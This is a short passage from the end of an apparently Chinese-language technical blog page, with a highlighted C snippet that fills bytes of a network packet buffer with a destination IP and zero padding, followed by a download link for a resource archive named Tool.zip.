	<span class="n">packet</span><span class="p">[</span><span class="mi">40</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">packet</span><span class="p">[</span><span class="mi">41</span><span class="p">]</span> <span class="o">=</span> <span class="n">dip</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>

	<span class="cm">/* Fill the rest of the packet with 0 */</span>
	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">42</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">61</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="n">packet</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
	<span class="p">}</span>	
<span class="p">}</span>
</code></pre></div></div>

<h3 id="九资源包下载">九、资源包下载</h3>

<p><a href="Tool.zip">Tool.zip</a>(33.7MB)</p>

<p>资源内包含以下内容：</p>

<p><img src="1569934011531.png" alt="1569934011531" /></p>

:ET